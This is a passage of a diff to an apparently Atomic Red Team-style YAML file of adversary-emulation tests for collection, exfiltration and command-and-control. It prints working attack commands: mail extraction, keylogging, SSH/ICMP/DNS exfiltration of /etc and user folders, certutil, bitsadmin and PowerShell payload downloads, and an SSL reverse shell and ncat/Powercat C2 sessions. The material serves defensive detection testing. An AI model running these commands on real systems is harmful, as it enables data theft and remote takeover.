|
|
|
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
|
|
|
|
|
-Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
|
|
|
|
|
Ignore
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -27457,7 +27561,7 @@ collection:
|
|
|
|
|
description: 'Search through local Outlook installation, extract mail, compress
|
|
|
|
|
the contents, and saves everything to a directory for later exfiltration.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27471,10 +27575,10 @@ collection:
|
|
|
|
|
command: 'powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1
|
|
|
|
|
-file #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1056:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27558,7 +27662,7 @@ collection:
|
|
|
|
|
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1113:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27614,7 +27718,7 @@ collection:
|
|
|
|
|
- name: Screencapture
|
|
|
|
|
description: 'Use screencapture command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27627,11 +27731,11 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'screencapture #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Screencapture (silent)
|
|
|
|
|
description: 'Use screencapture command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27644,12 +27748,12 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'screencapture -x #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: X Windows Capture
|
|
|
|
|
description: 'Use xwd command to collect a full desktop screenshot and review
|
|
|
|
|
file with xwud
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27665,7 +27769,7 @@ collection:
|
|
|
|
|
- name: Import
|
|
|
|
|
description: 'Use import command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27677,7 +27781,7 @@ collection:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'import -window root #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
exfiltration:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -27796,10 +27900,10 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compress Data for Exfiltration With Rar
|
|
|
|
|
description: "An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration.\nWhen the test completes you should find
|
|
|
|
@@ -27841,15 +27945,15 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - zip
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard zip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27873,18 +27977,18 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
prereq_command: 'ls #{input_files} > /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'zip #{output_file} #{input_files}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - gzip Single File
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard gzip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27904,15 +28008,15 @@ exfiltration:
|
|
|
|
|
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
|
|
|
|
|
>> #{input_file}; gzip -k #{input_file})
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{input_file}.gz
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - tar Folder or File
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard gzip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27935,10 +28039,10 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'tar -cvzf #{output_file} #{input_file_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1022:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27997,7 +28101,7 @@ exfiltration:
|
|
|
|
|
- name: Data Encrypted with zip and gpg symmetric
|
|
|
|
|
description: 'Encrypt data for exiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28017,7 +28121,7 @@ exfiltration:
|
|
|
|
|
ls -l
|
|
|
|
|
cleanup_command: 'rm -Rf /tmp/victim-files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compress Data and lock with password for Exfiltration with winrar
|
|
|
|
|
description: |
|
|
|
|
|
Note: Requires winrar installation
|
|
|
|
@@ -28074,7 +28178,7 @@ exfiltration:
|
|
|
|
|
- name: Compress Data and lock with password for Exfiltration with 7zip
|
|
|
|
|
description: 'Note: Requires 7zip installation
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -28135,7 +28239,7 @@ exfiltration:
|
|
|
|
|
- name: Data Transfer Size Limits
|
|
|
|
|
description: 'Take a file/directory, split it into 5Mb chunks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28226,7 +28330,7 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
|
|
|
description: |
|
|
|
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
@@ -28256,7 +28360,7 @@ exfiltration:
|
|
|
|
|
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
|
|
|
|
|
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - HTTP
|
|
|
|
|
description: |
|
|
|
|
|
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
|
|
|
|
@@ -28304,11 +28408,11 @@ exfiltration:
|
|
|
|
|
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
|
|
|
|
|
1500, $Data) }
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Exfiltration Over Alternative Protocol - DNS
|
|
|
|
|
description: 'Exfiltration of specified file over DNS protocol.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -28454,7 +28558,7 @@ command-and-control:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
unset http_proxy
|
|
|
|
|
unset https_proxy
|
|
|
|
@@ -28550,7 +28654,7 @@ command-and-control:
|
|
|
|
|
- name: Base64 Encoded data.
|
|
|
|
|
description: 'Utilizing a common technique for posting base64 encoded data.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28631,7 +28735,7 @@ command-and-control:
|
|
|
|
|
and using this to maintain access to the machine. Download of TeamViewer installer
|
|
|
|
|
will be at the destination location when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -28691,7 +28795,7 @@ command-and-control:
|
|
|
|
|
- name: rsync remote file copy (push)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28716,11 +28820,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rsync remote file copy (pull)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28745,11 +28849,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (push)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28774,11 +28878,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (pull)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28803,11 +28907,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (push)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28832,11 +28936,11 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (pull)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -28861,12 +28965,12 @@ command-and-control:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (urlcache)
|
|
|
|
|
description: 'Use certutil -urlcache argument to download a file from the web.
|
|
|
|
|
Note - /urlcache also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -28883,12 +28987,12 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (verifyctl)
|
|
|
|
|
description: 'Use certutil -verifyctl argument to download a file from the web.
|
|
|
|
|
Note - /verifyctl also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -28933,7 +29037,7 @@ command-and-control:
|
|
|
|
|
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
|
|
|
|
|
HIGH #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - PowerShell Download
|
|
|
|
|
description: |
|
|
|
|
|
This test uses PowerShell to download a payload.
|
|
|
|
@@ -28954,15 +29058,15 @@ command-and-control:
|
|
|
|
|
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
|
|
|
|
|
"#{destination_path}")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP Worming Activity
|
|
|
|
|
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
|
|
|
|
|
This emulates the activity.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29111,7 +29215,7 @@ command-and-control:
|
|
|
|
|
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
|
|
|
|
|
-QuickTimeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: DNS Regular Beaconing
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
|
|
|
|
@@ -29203,7 +29307,7 @@ command-and-control:
|
|
|
|
|
- name: OSTap Payload Download
|
|
|
|
|
description: 'Uses cscript //E:jscript to download a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29223,7 +29327,7 @@ command-and-control:
|
|
|
|
|
cscript //E:Jscript #{script_file}
|
|
|
|
|
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1032:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -29309,7 +29413,7 @@ command-and-control:
|
|
|
|
|
command: |
|
|
|
|
|
$server_ip = #{server_ip}
|
|
|
|
|
$server_port = #{server_port}
|
|
|
|
|
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
|
|
|
|
|
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
|
|
|
|
|
$stream = $socket.GetStream()
|
|
|
|
|
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
|
|
|
|
|
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
|
|
|
|
@@ -29436,7 +29540,7 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powercat C2
|
|
|
|
|
description: "Start C2 Session Using Powercat\nTo start the listener on a Linux
|
|
|
|
|
device, type the following: \nnc -l -p <port>\n"
|
|
|
|
@@ -29501,7 +29605,7 @@ command-and-control:
|
|
|
|
|
- name: Testing usage of uncommonly used port with PowerShell
|
|
|
|
|
description: 'Testing uncommonly used port utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -29518,11 +29622,11 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'test-netconnection -ComputerName #{domain} -port #{port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Testing usage of uncommonly used port
|
|
|
|
|
description: 'Testing uncommonly used port utilizing telnet.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -29540,7 +29644,7 @@ command-and-control:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'telnet #{domain} #{port}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1102:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -29607,7 +29711,7 @@ command-and-control:
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via command_prompt
|
|
|
|
|
description: 'Download data from a public website using command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -29616,14 +29720,14 @@ command-and-control:
|
|
|
|
|
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
|
|
|
|
|
%TEMP%\bitsadmindownload.html
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via powershell
|
|
|
|
|
description: 'Multiple download methods for files using powershell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|